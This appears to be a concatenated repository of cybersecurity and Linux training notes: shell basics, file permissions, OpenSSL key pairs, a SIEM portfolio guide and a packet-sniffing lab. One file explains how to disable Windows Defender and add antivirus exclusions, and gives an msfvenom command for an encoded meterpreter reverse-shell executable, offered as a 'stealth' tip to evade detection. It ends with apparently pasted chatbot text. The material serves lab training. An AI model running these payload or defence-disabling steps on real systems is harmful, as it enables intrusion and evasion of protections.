Editing Files** 15 | - Use `nano` or `vim` to edit `file1.txt` and add some text. 16 | - Use `cat` to display the content of `file1.txt`. 17 | - Use `head` to show the first 5 lines of `file1.txt`. 18 | - Use `tail` to show the last 5 lines of `file1.txt`. 19 | 20 | 4. **Searching for Files & Text** 21 | - Find all `.txt` files inside `my_project`. 22 | - Search for the word "Hello" inside `file1.txt` using `grep`. 23 | - Count the number of lines in `file1.txt`. 24 | 25 | --- 26 | 27 | ## **Intermediate Tasks** 28 | 5. **User & Group Management** 29 | - Create a new user named `student1` (use `sudo adduser student1`). 30 | - Add `student1` to the `sudo` group. 31 | - Create a new group called `dev_team`. 32 | - Add `student1` to the `dev_team` group. 33 | 34 | 6. **Process & Resource Management** 35 | - List all running processes. 36 | - Find the PID of a process (e.g., `firefox` or `chrome`). 37 | - Kill a specific process using its PID. 38 | - Check system memory usage. 39 | 40 | 7. **Networking Tasks** 41 | - Check the system's IP address. 42 | - Ping a website like `google.com` and record the response time. 43 | - Display all open network ports. 44 | 45 | 8. **Archiving & Compression** 46 | - Create a compressed archive of `my_project` using `tar`. 47 | - Extract the archive to another location. 48 | - Zip a file and unzip it to another directory. 49 | 50 | --- 51 | 52 | ## **Advanced Tasks** 53 | 9. **Automation & Scripting** 54 | - Write a script that prints "Hello, Linux!" and the current date. 55 | - Modify the script to take a user’s name as input and greet them. 56 | - Schedule the script to run every day at 10 AM using `cron`. 57 | 58 | 10. **System Monitoring & Security** 59 | - Check disk space usage. 60 | - List all users logged into the system. 61 | - Monitor system logs for login attempts. 62 | 63 | --- 64 | 65 | ## **Bonus Challenge** 66 | - Write a **script** that: 67 | - Creates a backup of a folder. 68 | - Appends the current date to the backup filename. 69 | - Deletes backups older than 7 days. 70 | -------------------------------------------------------------------------------- /projects/post-exploitation-research.md: -------------------------------------------------------------------------------- 1 | Running `msfvenom` payloads on Windows 10 will often get blocked by Windows Defender or third-party antivirus software. This is expected behavior, as these payloads are designed to simulate malicious behavior. 2 | 3 | > ⚠️ **Important:** Disabling Windows Defender or antivirus protection makes your system vulnerable. Only do this in a **safe, isolated lab environment** (e.g., a VM) used for ethical hacking, training, or malware analysis. 4 | 5 | --- 6 | 7 | ## ✅ Safe Method: Use a Virtual Machine (Recommended) 8 | 9 | **Create an isolated VM** (using VirtualBox, VMware, or Hyper-V): 10 | 11 | * Install Windows 10. 12 | * Disable network connection (or use Host-only/NAT). 13 | * Turn off Windows Defender in the VM only. 14 | * Use snapshots to revert if anything breaks. 15 | 16 | --- 17 | 18 | ## ⚙️ If You're Still Doing It on Bare Metal (Not Recommended) 19 | 20 | ### 1. **Temporarily Disable Windows Defender:** 21 | 22 | **Option A: Windows Security Settings** 23 | 24 | 1. Go to `Start` → type `Windows Security`. 25 | 2. Click on **Virus & threat protection**. 26 | 3. Click **Manage settings** under **Virus & threat protection settings**. 27 | 4. Toggle **Real-time protection** to **Off**. 28 | 29 | **Option B: PowerShell (Run as Administrator)** 30 | 31 | ```powershell 32 | Set-MpPreference -DisableRealtimeMonitoring $true 33 | ``` 34 | 35 | To enable again: 36 | 37 | ```powershell 38 | Set-MpPreference -DisableRealtimeMonitoring $false 39 | ``` 40 | 41 | --- 42 | 43 | ### 2. **Add Folder/File Exclusion Instead (Safer)** 44 | 45 | This avoids turning off all Defender: 46 | 47 | 1. Go to **Windows Security** → **Virus & threat protection**. 48 | 2. Scroll to **Exclusions** → Click **Add or remove exclusions**. 49 | 3. Click **+ Add an exclusion** → Choose **Folder/File**. 50 | 4. Add the folder where you save your `msfvenom` payloads. 51 | 52 | --- 53 | 54 | ### 3. **Check for Third-Party Antivirus** 55 | 56 | If you're using something like: 57 | 58 | * Avast 59 | * Bitdefender 60 | * McAfee 61 | 62 | …you'll need to open that software and: 63 | 64 | * Disable real-time protection. 65 | * Whitelist the payload folder. 66 | 67 | --- 68 | 69 | ### 🧪 Pro Tip for Stealth 70 | 71 | * Use encoding or obfuscation in `msfvenom`: 72 | 73 | ```bash 74 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port -f exe -e x86/shikata_ga_nai -i 5 -o payload.exe 75 | ``` 76 | 77 | Still might get flagged, but helps bypass basic detection. 78 | 79 | --- 80 | 81 | ## ⚠️ Final Reminder 82 | 83 | Do this **only in a controlled lab**. If you're teaching, testing, or training, using tools like: 84 | 85 | * VirtualBox 86 | * Cuckoo Sandbox 87 | * FLARE VM 88 | 89 | …can provide a safer space to run and analyze malware-like files. 90 | 91 | Would you like help setting up a proper **Windows test lab** with Defender turned off? 92 | -------------------------------------------------------------------------------- /projects/fiver_siem_guide.md: -------------------------------------------------------------------------------- 1 | ## **🛠️ 1. Projects to Build for Your SIEM Portfolio** 2 | You’ll work on real-world use cases using open-source and enterprise SIEM tools (Splunk Free, Wazuh, Elastic SIEM, Microsoft Sentinel, or IBM QRadar Community Edition). 3 | 4 | ### **🔹 Project 1: SIEM Setup & Log Collection** 5 | ✅ **Goal:** Set up a SIEM system, collect logs from multiple sources (firewall, endpoint, cloud, etc.). 6 | ✅ **Tools:** Wazuh SIEM, Splunk Free, or Elastic SIEM. 7 | ✅ **Tasks:** 8 | - Install and configure Wazuh or Splunk on a **cloud server (AWS, Azure, or local VM)**. 9 | - Integrate **firewall logs (pfSense, Fortinet, Cisco)**. 10 | - Collect **Windows Event Logs & Sysmon logs** from a Windows machine. 11 | - Collect **Linux system logs** using Filebeat. 12 | - Document your process and provide screenshots. 13 | 🔹 **Deliverable:** A detailed write-up with screenshots & a video demo. 14 | 15 | --- 16 | 17 | ### **🔹 Project 2: Real-Time Threat Detection & Alerts** 18 | ✅ **Goal:** Set up custom detection rules for cyber threats. 19 | ✅ **Tools:** Splunk, Microsoft Sentinel, IBM QRadar. 20 | ✅ **Tasks:** 21 | - Install and configure **SIEM correlation rules**. 22 | - Create detection rules for: 23 | 🔥 Brute-force attacks on SSH & RDP. 24 | 🔥 Unauthorized admin privilege escalation. 25 | 🔥 Malware or suspicious PowerShell execution. 26 | - Generate **alerts to detect threats in real time**. 27 | - Simulate **malware or attack scenarios** using Atomic Red Team or Kali Linux. 28 | 🔹 **Deliverable:** A blog post or GitHub write-up showing threat detection in action. 29 | 30 | --- 31 | 32 | ### **🔹 Project 3: SIEM Dashboard & Incident Response** 33 | ✅ **Goal:** Create a **custom SIEM dashboard** for security operations. 34 | ✅ **Tools:** Splunk, Elastic SIEM, or Microsoft Sentinel. 35 | ✅ **Tasks:** 36 | - Build **a security monitoring dashboard** with visualizations. 37 | - Include logs from **firewall, Windows/Linux systems, and cloud logs**. 38 | - Automate **incident response workflows** (email alerts, Slack notifications). 39 | 🔹 **Deliverable:** A step-by-step guide or YouTube video on how you built it. 40 | 41 | --- 42 | 43 | ## **💡 2. Where to Host Your Portfolio?** 44 | 📝 **GitHub:** Create a repository with your SIEM projects. 45 | 🎥 **YouTube:** Record short **walkthrough videos**. 46 | 🖥️ **Blog/LinkedIn Articles:** Write in-depth posts about your projects. 47 | 📸 **Fiverr Gig Samples:** Upload **screenshots** from your projects as proof of expertise. 48 | 49 | --- 50 | 51 | ## **🚀 3. Bonus: Add a Certification to Stand Out!** 52 | If you want **extra credibility**, get certified in: 53 | - 📜 **Splunk Certified User** (for Splunk-based gigs). 54 | - 📜 **Microsoft Security, Compliance, and Identity Fundamentals (SC-900)** (for Sentinel). 55 | - 📜 **Elastic SIEM Specialist**. 56 | - 📜 **IBM QRadar SIEM Certification**. 57 | -------------------------------------------------------------------------------- /week1/day_1.md: -------------------------------------------------------------------------------- 1 | ### Navigation Basics in Linux 2 | 3 | In Linux, navigation is one of the most essential skills for effectively using the command-line interface (CLI). By mastering a few basic commands, you can easily move between directories, view files and folders, and understand your current location within the system. 4 | 5 | Here are some **key navigation commands** and how to use them: 6 | 7 | --- 8 | 9 | ### 1. **`cd` (Change Directory)** 10 | The `cd` command is used to move from one directory to another. 11 | 12 | - **Syntax:** 13 | ```bash 14 | cd /path/to/directory 15 | ``` 16 | 17 | - **Examples:** 18 | - Go to the home directory: 19 | ```bash 20 | cd ~ 21 | ``` 22 | - Move up one level (to the parent directory): 23 | ```bash 24 | cd .. 25 | ``` 26 | - Change to a specific folder: 27 | ```bash 28 | cd /var/log 29 | ``` 30 | - Return to the previous directory: 31 | ```bash 32 | cd - 33 | ``` 34 | 35 | --- 36 | 37 | ### 2. **`pwd` (Print Working Directory)** 38 | The `pwd` command shows your current directory (your location in the file system). 39 | 40 | - **Syntax:** 41 | ```bash 42 | pwd 43 | ``` 44 | 45 | - **Example:** 46 | ```bash 47 | /home/username/Documents 48 | ``` 49 | 50 | --- 51 | 52 | ### 3. **`ls` (List Directory Contents)** 53 | The `ls` command lists the files and directories in the current location. 54 | 55 | - **Syntax:** 56 | ```bash 57 | ls 58 | ``` 59 | 60 | - **Examples:** 61 | - Basic listing: 62 | ```bash 63 | ls 64 | ``` 65 | - Detailed listing (shows permissions, file size, etc.): 66 | ```bash 67 | ls -l 68 | ``` 69 | - Include hidden files: 70 | ```bash 71 | ls -a 72 | ``` 73 | 74 | --- 75 | 76 | ### 4. **`tree` (Directory Structure Visualization)** 77 | The `tree` command displays a tree-like structure of directories and files. It helps visualize the hierarchy. 78 | 79 | - **Syntax:** 80 | ```bash 81 | tree 82 | ``` 83 | 84 | - **Example:** 85 | ```bash 86 | tree /path/to/directory 87 | ``` 88 | Output: 89 | ``` 90 | /home/username 91 | ├── Documents 92 | ├── Downloads 93 | └── Pictures 94 | ``` 95 | 96 | *Note: The `tree` command might need to be installed on your system using a package manager (e.g., `sudo apt install tree` on Ubuntu).* 97 | 98 | --- 99 | 100 | ### Combining Commands 101 | You can combine these commands to quickly navigate and explore the filesystem: 102 | - Navigate to a directory and list its contents: 103 | ```bash 104 | cd /var/log && ls 105 | ``` 106 | - Show your current directory and its contents: 107 | ```bash 108 | pwd && ls 109 | ``` 110 | 111 | --- 112 | 113 | By mastering these basic commands, you'll efficiently move around your Linux filesystem and have better control over your files and directories! 114 | -------------------------------------------------------------------------------- /projects/sniffing-network.md: -------------------------------------------------------------------------------- 1 | ## **Network Security Lab Exercise: Sniffers for Network and Protocol Analysis** 2 | 3 | ### **Background** 4 | Network sniffers like **Wireshark** and **tcpdump** are tools used to capture and analyze network traffic. These tools help cybersecurity professionals inspect network protocols, identify suspicious activity, troubleshoot issues, and detect attacks like plaintext credentials or unencrypted traffic. 5 | 6 | Understanding how to use sniffers is a core skill in both offensive (pentesting) and defensive (blue team) roles. 7 | 8 | --- 9 | 10 | ### **Learning Objectives** 11 | By the end of this exercise, you will: 12 | - Understand what sniffers are and what they capture 13 | - Use a sniffer (Wireshark or tcpdump) to analyze traffic 14 | - Identify different protocols (HTTP, DNS, TCP, etc.) 15 | - Extract useful information from captured packets (e.g., credentials, hosts, visited sites) 16 | 17 | --- 18 | 19 | ### **Prerequisites** 20 | - Wireshark installed on the host or VM 21 | - Optionally: tcpdump installed on a Linux VM (Kali or Ubuntu) 22 | - Internet connection or access to a test network environment 23 | - A browser or client to generate basic HTTP, DNS, or FTP traffic 24 | 25 | --- 26 | 27 | ### **Tasks** 28 | 29 | #### **Step 1: Start a Packet Capture** 30 | Use **tcpdump** to capture traffic: 31 | ```bash 32 | sudo tcpdump -i eth0 -nn -v -w capture.pcap 33 | ``` 34 | 35 | #### **Step 2: Generate Traffic** 36 | Perform simple actions like: 37 | - Visit a website (`localhost/dvwa`) 38 | - Use `ping` or `nslookup` from terminal 39 | - Use `ftp` or `telnet` to connect to a local server 40 | 41 | This generates traffic Wireshark can observe. 42 | 43 | --- 44 | 45 | #### **Step 3: Analyze Protocols** 46 | In Wireshark: 47 | - Use the **"Protocol"** column to filter for: 48 | - `http` 49 | - `dns` 50 | - `tcp` 51 | - `ftp` (if tested) 52 | - Use the **Filter bar**, e.g.: 53 | ```plaintext 54 | http.request 55 | dns 56 | tcp.port == 21 57 | ``` 58 | 59 | Use: 60 | 1. Open **Wireshark**. 61 | 2. Load the captured file. 62 | 3. Try to: 63 | - Identify the source and destination IPs 64 | - Observe TCP handshakes 65 | - See what sites or hosts were contacted 66 | 67 | #### **Step 4: Extract Information** 68 | From the captured traffic: 69 | - Find the **Host** and **User-Agent** headers from HTTP requests 70 | - Look for **GET** or **POST** requests and any visible parameters 71 | - Try to spot credentials if basic auth 72 | 73 | --- 74 | 75 | ### **Validation Checklist** 76 | 77 | | Task | Expected Output or Evidence | 78 | |-----------------------------------------|----------------------------------------------------| 79 | | Sniffer launched and packets captured | Screenshot or `.pcap` file showing packet data | 80 | | Protocols filtered and identified | List of protocols observed (HTTP, DNS, TCP, etc.) | 81 | | Packet details analyzed | IP addresses, flags, ports noted | 82 | | Data extracted from a packet | Hostname, URL path, or login credentials shown | 83 | -------------------------------------------------------------------------------- /projects/permission-ownership.md: -------------------------------------------------------------------------------- 1 | ## 📁 1. Viewing File Permissions 2 | 3 | Use the `ls -l` command: 4 | 5 | ```bash 6 | ls -l filename 7 | ``` 8 | 9 | ### Example: 10 | 11 | ```bash 12 | -rwxr-xr-- 1 root root 1234 Jun 19 13:00 script.sh 13 | ``` 14 | 15 | ### Breakdown: 16 | 17 | * `-rwxr-xr--` → Permissions 18 | * `1` → Link count 19 | * `root` → Owner 20 | * `root` → Group 21 | * `1234` → Size in bytes 22 | * `Jun 19 13:00` → Timestamp 23 | * `script.sh` → File name 24 | 25 | --- 26 | 27 | ## 🔐 2. Understanding Permissions 28 | 29 | Format: `[File Type][Owner][Group][Others]` 30 | 31 | | Symbol | Meaning | 32 | | ------ | ------------- | 33 | | `-` | Regular file | 34 | | `d` | Directory | 35 | | `r` | Read | 36 | | `w` | Write | 37 | | `x` | Execute | 38 | | `-` | No permission | 39 | 40 | Example: 41 | 42 | ``` 43 | -rwxr-xr-- 44 | | | | | 45 | | | | └── Others: r (read), - (no write), - (no execute) 46 | | | └──── Group: r (read), - (no write), x (execute) 47 | | └────── Owner: r (read), w (write), x (execute) 48 | ``` 49 | 50 | --- 51 | 52 | ## 🛠️ 3. Changing Permissions – `chmod` 53 | 54 | ### Syntax: 55 | 56 | ```bash 57 | chmod [permissions] filename 58 | ``` 59 | 60 | ### A. **Symbolic Mode:** 61 | 62 | ```bash 63 | chmod u+x script.sh # Add execute to user 64 | chmod g-w file.txt # Remove write from group 65 | chmod o=r file.txt # Set others to read-only 66 | ``` 67 | 68 | ### B. **Octal Mode:** 69 | 70 | ```bash 71 | chmod 755 script.sh # rwxr-xr-x 72 | chmod 644 file.txt # rw-r--r-- 73 | chmod 700 secret.txt # rwx------ 74 | ``` 75 | 76 | | Number | Permission | Meaning | 77 | | ------ | ---------- | -------------- | 78 | | 7 | rwx | Full access | 79 | | 6 | rw- | Read + write | 80 | | 5 | r-x | Read + execute | 81 | | 4 | r-- | Read only | 82 | | 0 | --- | No permission | 83 | 84 | --- 85 | 86 | ## 👤 4. Changing Ownership – `chown` and `chgrp` 87 | 88 | ### Change owner: 89 | 90 | ```bash 91 | sudo chown newuser file.txt 92 | ``` 93 | 94 | ### Change owner and group: 95 | 96 | ```bash 97 | sudo chown newuser:newgroup file.txt 98 | ``` 99 | 100 | ### Change group only: 101 | 102 | ```bash 103 | sudo chgrp newgroup file.txt 104 | ``` 105 | 106 | 107 | ## 5. Examples for Practice 108 | 109 | ### A. Make a script executable by owner only: 110 | 111 | ```bash 112 | chmod 700 exploit.sh 113 | ``` 114 | 115 | ### B. Give read/write to owner and read to everyone else: 116 | 117 | ```bash 118 | chmod 644 report.txt 119 | ``` 120 | 121 | ### C. Change owner to `kali` and group to `pentesters`: 122 | 123 | ```bash 124 | sudo chown kali:pentesters shell.py 125 | ``` 126 | 127 | 128 | 129 | ## Bonus: Recursively Change Permissions 130 | 131 | * All files in a directory: 132 | 133 | ```bash 134 | chmod -R 644 /path/to/files/ 135 | ``` 136 | 137 | * All directories (and execute bit): 138 | 139 | ```bash 140 | find /path -type d -exec chmod 755 {} \; 141 | ``` 142 | 143 | -------------------------------------------------------------------------------- /week3/command_help.md: -------------------------------------------------------------------------------- 1 | ## **Getting Help with Commands in Linux** 2 | 3 | When working in the **Linux shell**, it's important to know how to get help with commands. Linux provides built-in tools to **understand command usage, syntax, and options**. 4 | 5 | --- 6 | 7 | ## **1. Using the `--help` Option** 8 | Most commands support the `--help` flag, which provides a brief description of available options. 9 | 10 | ### **Example:** 11 | ```bash 12 | ls --help 13 | grep --help 14 | cp --help 15 | ``` 16 | **Output:** 17 | It displays a **short manual** for the command, including available options. 18 | 19 | > **Activity:** Try running `--help` with different commands. 20 | 21 | --- 22 | 23 | ## **2. Using the `man` Command (Manual Pages)** 24 | The `man` command shows the **detailed manual** for a command. 25 | 26 | ### **Syntax:** 27 | ```bash 28 | man 29 | ``` 30 | ### **Example:** 31 | ```bash 32 | man ls 33 | man grep 34 | man chmod 35 | ``` 36 | To **navigate**: 37 | - **Up/Down arrows** → Scroll 38 | - **Spacebar** → Next page 39 | - **q** → Quit 40 | 41 | > **Activity:** Use `man` to explore at least three different commands. 42 | 43 | --- 44 | 45 | ## **3. Using the `info` Command** 46 | The `info` command provides **more detailed documentation** than `man`. 47 | ```bash 48 | info ls 49 | info grep 50 | info bash 51 | ``` 52 | > **Activity:** Compare the `man` and `info` outputs for `ls`. 53 | 54 | --- 55 | 56 | ## **4. Using the `whatis` Command** 57 | The `whatis` command gives a **one-line description** of a command. 58 | 59 | ### **Example:** 60 | ```bash 61 | whatis ls 62 | whatis grep 63 | whatis chmod 64 | ``` 65 | > **Activity:** Try `whatis` on 5 different commands. 66 | 67 | --- 68 | 69 | ## **5. Using the `apropos` Command** 70 | The `apropos` command **searches the manual pages** for related topics. 71 | 72 | ### **Example:** 73 | ```bash 74 | apropos network 75 | apropos file 76 | ``` 77 | **Use case:** If you don’t know the exact command, but you know what you need. 78 | 79 | > **Activity:** Search for commands related to "process" or "disk". 80 | 81 | --- 82 | 83 | ## **6. Using the `type` Command** 84 | The `type` command tells you **whether a command is built-in or an external binary**. 85 | 86 | ### **Example:** 87 | ```bash 88 | type ls 89 | type echo 90 | type cd 91 | ``` 92 | > **Activity:** Find out if `pwd` and `grep` are built-in or external. 93 | 94 | --- 95 | 96 | ## **7. Using the `which` and `whereis` Commands** 97 | These commands help locate where an executable file is stored. 98 | 99 | ### **Example:** 100 | ```bash 101 | which python 102 | which bash 103 | whereis ls 104 | whereis nano 105 | ``` 106 | > **Activity:** Use `which` and `whereis` on different commands and compare their outputs. 107 | 108 | --- 109 | 110 | ## **8. Using the `help` Command (For Built-in Commands)** 111 | For built-in **Bash** commands like `cd`, `echo`, or `exit`, use: 112 | ```bash 113 | help cd 114 | help echo 115 | help exit 116 | ``` 117 | > **Activity:** Use `help` on 3 built-in commands. 118 | -------------------------------------------------------------------------------- /week1/day4_delete.md: -------------------------------------------------------------------------------- 1 | ### **Creating Files in Linux** 2 | 3 | Creating files is essential for organizing and storing data. Linux provides several commands to create both empty and pre-filled files. 4 | 5 | --- 6 | 7 | #### **1. Using `touch`** 8 | Creates an empty file. 9 | - **Syntax:** 10 | ```bash 11 | touch filename 12 | ``` 13 | - **Example:** 14 | ```bash 15 | touch newfile.txt 16 | ``` 17 | This creates an empty file named `newfile.txt`. 18 | 19 | --- 20 | 21 | #### **2. Using `echo`** 22 | Creates a file with text content. 23 | - **Syntax:** 24 | ```bash 25 | echo "text" > filename 26 | ``` 27 | - **Example:** 28 | ```bash 29 | echo "Hello, world!" > newfile.txt 30 | ``` 31 | This creates `newfile.txt` with the content `Hello, world!`. 32 | 33 | --- 34 | 35 | #### **3. Using `cat`** 36 | Allows you to create a file and input text directly into it. 37 | - **Syntax:** 38 | ```bash 39 | cat > filename 40 | ``` 41 | - **Example:** 42 | ```bash 43 | cat > newfile.txt 44 | ``` 45 | Type your content and press `Ctrl+D` to save and exit. 46 | 47 | --- 48 | 49 | #### **4. Using `nano` or `vi`** 50 | These are text editors that allow you to create and edit files interactively. 51 | - **Example with `nano`:** 52 | ```bash 53 | nano newfile.txt 54 | ``` 55 | Add content, then save and exit (`Ctrl+O` to save, `Ctrl+X` to exit). 56 | 57 | --- 58 | 59 | ### **Deleting Files in Linux** 60 | 61 | Deleting files helps manage disk space by removing unnecessary or unwanted files. The `rm` command is commonly used. 62 | 63 | --- 64 | 65 | #### **1. Using `rm`** 66 | Deletes a file permanently. 67 | - **Syntax:** 68 | ```bash 69 | rm filename 70 | ``` 71 | - **Example:** 72 | ```bash 73 | rm example.txt 74 | ``` 75 | This deletes the file `example.txt`. 76 | 77 | --- 78 | 79 | #### **2. Using `rm -i` (Interactive Mode)** 80 | Asks for confirmation before deleting a file, preventing accidental deletion. 81 | - **Example:** 82 | ```bash 83 | rm -i example.txt 84 | ``` 85 | Prompts: 86 | ``` 87 | rm: remove regular file 'example.txt'? y 88 | ``` 89 | 90 | --- 91 | 92 | #### **3. Deleting Multiple Files** 93 | You can delete multiple files at once. 94 | - **Example:** 95 | ```bash 96 | rm file1.txt file2.txt file3.txt 97 | ``` 98 | 99 | --- 100 | 101 | #### **4. Deleting Directories** 102 | - **Using `rm -r`:** Deletes a directory and its contents recursively. 103 | ```bash 104 | rm -r directory_name 105 | ``` 106 | - **Using `rmdir`:** Deletes an **empty** directory. 107 | ```bash 108 | rmdir directory_name 109 | ``` 110 | 111 | --- 112 | 113 | ### **Tips for Safe Deletion** 114 | 1. Use `rm -i` for confirmation when deleting important files. 115 | 2. Avoid using `rm` with wildcards (`*`) unless you’re absolutely sure of its impact. 116 | 3. Use `ls` to check the files in a directory before deleting: 117 | ```bash 118 | ls 119 | ``` 120 | 121 | By mastering file creation and deletion, you’ll have better control over your Linux filesystem! 122 | -------------------------------------------------------------------------------- /week3/env_variable.md: -------------------------------------------------------------------------------- 1 | ## **Environment Variables in Shell Basics** 2 | 3 | ### **What Are Environment Variables?** 4 | Environment variables are key-value pairs used by the **shell** and **programs** to store system-wide settings, user preferences, and configurations. They help control system behavior and provide essential information about the environment. 5 | 6 | --- 7 | 8 | ## **1. Viewing Environment Variables** 9 | To display all environment variables, use: 10 | ```bash 11 | printenv 12 | env 13 | ``` 14 | To check a specific variable: 15 | ```bash 16 | echo $HOME 17 | echo $USER 18 | echo $PATH 19 | ``` 20 | > **Activity:** Run `printenv` and identify key environment variables. 21 | 22 | --- 23 | 24 | ## **2. Common Environment Variables** 25 | | **Variable** | **Description** | 26 | |-------------|----------------| 27 | | `$USER` | Shows the currently logged-in user. | 28 | | `$HOME` | Home directory of the user. | 29 | | `$SHELL` | The shell being used (e.g., `/bin/bash`). | 30 | | `$PWD` | Current working directory. | 31 | | `$PATH` | Directories where the shell looks for executable files. | 32 | | `$EDITOR` | Default text editor (e.g., `vim` or `nano`). | 33 | | `$LANG` | System language setting. | 34 | | `$LOGNAME` | The name of the logged-in user. | 35 | 36 | > **Activity:** Use `echo` to display values of different environment variables. 37 | 38 | --- 39 | 40 | ## **3. Setting and Modifying Environment Variables** 41 | ### **a. Temporarily Setting a Variable** 42 | ```bash 43 | export MY_VAR="Hello, Linux!" 44 | echo $MY_VAR 45 | ``` 46 | This variable will **only** exist in the current terminal session. 47 | 48 | ### **b. Permanently Setting a Variable** 49 | To make a variable **persistent**, add it to: 50 | - **Bash users:** `~/.bashrc` 51 | - **Zsh users:** `~/.zshrc` 52 | - **System-wide:** `/etc/environment` 53 | 54 | Example: 55 | ```bash 56 | echo 'export MY_VAR="Hello, World!"' >> ~/.bashrc 57 | source ~/.bashrc 58 | ``` 59 | 60 | > **Activity:** Set a temporary variable, then make it permanent. 61 | 62 | --- 63 | 64 | ## **4. Unsetting and Deleting Variables** 65 | To remove an environment variable: 66 | ```bash 67 | unset MY_VAR 68 | echo $MY_VAR # Will return empty 69 | ``` 70 | > **Activity:** Set a variable, use `unset`, and verify it’s removed. 71 | 72 | --- 73 | 74 | ## **5. Using Environment Variables in Scripts** 75 | Variables are useful in **Bash scripting**. 76 | 77 | Example script (`myscript.sh`): 78 | ```bash 79 | #!/bin/bash 80 | echo "Hello, $USER!" 81 | echo "Your home directory is: $HOME" 82 | ``` 83 | Run the script: 84 | ```bash 85 | chmod +x myscript.sh 86 | ./myscript.sh 87 | ``` 88 | > **Activity:** Create a script that uses `$USER` and `$HOME`. 89 | 90 | --- 91 | 92 | ## **6. Path and Command Execution** 93 | The `$PATH` variable stores directories where the system looks for executable commands. 94 | 95 | Example: 96 | ```bash 97 | echo $PATH 98 | ``` 99 | To add a directory permanently: 100 | ```bash 101 | export PATH=$PATH:/home/user/scripts 102 | ``` 103 | > **Activity:** Add a custom directory to `$PATH` and execute a script from it. 104 | -------------------------------------------------------------------------------- /week1/keypair.md: -------------------------------------------------------------------------------- 1 | ### **🔹 Creating a Normal RSA Key Pair (Private & Public Key)** 2 | If you just need a **basic key pair** (not a self-signed certificate), you can generate a standard **RSA key pair** (private and public keys) without the extra certificate-related commands. 3 | 4 | --- 5 | 6 | ## **Step 1: Generate the Private Key** 7 | Run the following command to generate a **4096-bit RSA private key**: 8 | ```bash 9 | openssl genpkey -algorithm RSA -out private_key.pem -pkeyopt rsa_keygen_bits:4096 10 | ``` 11 | ✅ **This creates** `private_key.pem`, which contains your **private key**. 12 | 13 | --- 14 | 15 | ## **Step 2: Extract the Public Key** 16 | Now, extract the **public key** from the private key: 17 | ```bash 18 | openssl rsa -in private_key.pem -pubout -out public_key.pem 19 | ``` 20 | **This creates** `public_key.pem`, which contains your **public key**. 21 | 22 | --- 23 | 24 | ## **Step 3: Verify the Keys** 25 | Check if the private key is valid: 26 | ```bash 27 | openssl rsa -in private_key.pem -check 28 | ``` 29 | ✅ **Expected output:** 30 | ``` 31 | RSA key ok 32 | ``` 33 | 34 | Check if the public key is valid: 35 | ```bash 36 | openssl rsa -in public_key.pem -pubin -text -noout 37 | ``` 38 | ✅ **Expected output:** 39 | A readable format of the public key. 40 | 41 | --- 42 | 43 | ## **📌 Step 4 (Optional): Encrypt the Private Key** 44 | For better security, you can encrypt the private key with **AES-256**: 45 | ```bash 46 | openssl genpkey -algorithm RSA -out encrypted_private_key.pem -aes256 -pass pass:YourStrongPassword -pkeyopt rsa_keygen_bits:4096 47 | ``` 48 | ✅ **This will prompt for a password**, which will be needed to use the private key. 49 | 50 | --- 51 | 52 | ## **📌 Summary of Commands** 53 | | **Step** | **Command** | 54 | |----------|------------| 55 | | Generate a **private key** | `openssl genpkey -algorithm RSA -out private_key.pem -pkeyopt rsa_keygen_bits:4096` | 56 | | Extract the **public key** | `openssl rsa -in private_key.pem -pubout -out public_key.pem` | 57 | | Verify **private key** | `openssl rsa -in private_key.pem -check` | 58 | | Verify **public key** | `openssl rsa -in public_key.pem -pubin -text -noout` | 59 | | Encrypt **private key (optional)** | `openssl genpkey -algorithm RSA -out encrypted_private_key.pem -aes256 -pass pass:YourStrongPassword -pkeyopt rsa_keygen_bits:4096` | 60 | 61 | --- 62 | 63 | ### **📌 Key Differences Between This and the Previous Method** 64 | | **Feature** | **Normal Key Pair (This Method)** | **Self-Signed Certificate (Previous Method)** | 65 | |------------|--------------------------------|--------------------------------| 66 | | **Purpose** | Used for **encryption, signing, and authentication** | Used for **SSL/TLS authentication** | 67 | | **Files Generated** | `private_key.pem`, `public_key.pem` | `key.pem` (private), `cert.pem` (public cert) | 68 | | **Requires a CN (Common Name)?** | ❌ No | ✅ Yes | 69 | | **Encrypt Data?** | ✅ Yes, encrypt/sign messages | ✅ Yes, secure web connections (HTTPS) | 70 | 71 | --- 72 | 73 | ### **📌 What Can You Do With This Key Pair?** 74 | - **🔐 Encrypt & Decrypt Messages** using RSA. 75 | - **🖊️ Digitally Sign & Verify Data**. 76 | - **🔑 Authenticate Users** (SSH key-based authentication). 77 | -------------------------------------------------------------------------------- /week3/path_shell.md: -------------------------------------------------------------------------------- 1 | ## **Command Path in Shell Basics** 2 | 3 | The **command path** in Linux determines where the system looks for executable files when a user types a command in the terminal. Understanding the **command path** is essential for running programs and scripts efficiently. 4 | 5 | --- 6 | 7 | ## **1. Understanding `$PATH` Variable** 8 | The `$PATH` variable is an environment variable that stores directories where the system searches for executable commands. 9 | 10 | ### **Check Your Current Path** 11 | ```bash 12 | echo $PATH 13 | ``` 14 | This will output a list of directories separated by colons (`:`), for example: 15 | ``` 16 | /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/home/user/bin 17 | ``` 18 | Each directory listed is where the shell looks for commands when you type them. 19 | 20 | > **Activity:** Run `echo $PATH` and identify key directories. 21 | 22 | --- 23 | 24 | ## **2. Finding the Location of a Command** 25 | To find where a command is located, use: 26 | 27 | ### **Which Command** 28 | ```bash 29 | which ls 30 | which python 31 | which nano 32 | ``` 33 | This shows the **exact path** of an executable. 34 | 35 | ### **Whereis Command** 36 | ```bash 37 | whereis ls 38 | whereis bash 39 | ``` 40 | It provides more details, including source and documentation locations. 41 | 42 | > **Activity:** Use `which` and `whereis` to check the paths of different commands. 43 | 44 | --- 45 | 46 | ## **3. Running Programs Using Absolute & Relative Paths** 47 | 48 | ### **a. Absolute Path (Full Path)** 49 | An absolute path specifies the full location of a file or program. 50 | 51 | Example: 52 | ```bash 53 | /bin/ls 54 | /usr/bin/python3 55 | ``` 56 | No matter which directory you're in, this will work. 57 | 58 | ### **b. Relative Path (Relative to Current Directory)** 59 | A relative path depends on the current working directory. 60 | 61 | Example: 62 | ```bash 63 | ./script.sh # Runs script from current directory 64 | ../script.sh # Runs script from parent directory 65 | ``` 66 | 67 | > **Activity:** Create a script, run it using absolute and relative paths. 68 | 69 | --- 70 | 71 | ## **4. Modifying the `$PATH` Variable** 72 | 73 | ### **a. Temporarily Adding a Directory to `$PATH`** 74 | ```bash 75 | export PATH=$PATH:/home/user/scripts 76 | ``` 77 | Now, any script in `/home/user/scripts` can be run without specifying its path. 78 | 79 | ### 